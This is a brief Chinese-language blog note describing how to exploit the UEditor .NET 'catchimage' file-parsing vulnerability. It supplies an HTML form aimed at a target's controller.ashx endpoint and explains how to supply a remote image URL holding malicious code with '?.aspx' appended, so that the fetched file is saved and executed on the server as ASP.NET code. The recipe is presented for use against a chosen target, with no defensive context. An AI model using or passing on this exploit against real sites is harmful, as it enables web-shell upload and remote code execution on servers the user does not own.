【笔记】UEditor文件解析漏洞

前言

UEditor文件解析漏洞

漏洞利用

  • 构造一个HTML,并用浏览器打开

127.0.0.1:80:改为目标站点域名或ip地址

1
2
3
4
<form action="http://127.0.0.1:80/ueditor/net/controller.ashx?action=catchimage" enctype="multipart/form-data" method="post">
<input type="text" name="source[]">
<input type="submit" value="Submit">
</form>
  • 在文本框中填写一个包含恶意代码的图片公网地址,后缀添加?.aspx,上传成功后访问这个文件即可被当作asp代码执行

完成

参考文献

哔哩哔哩——xiaodisec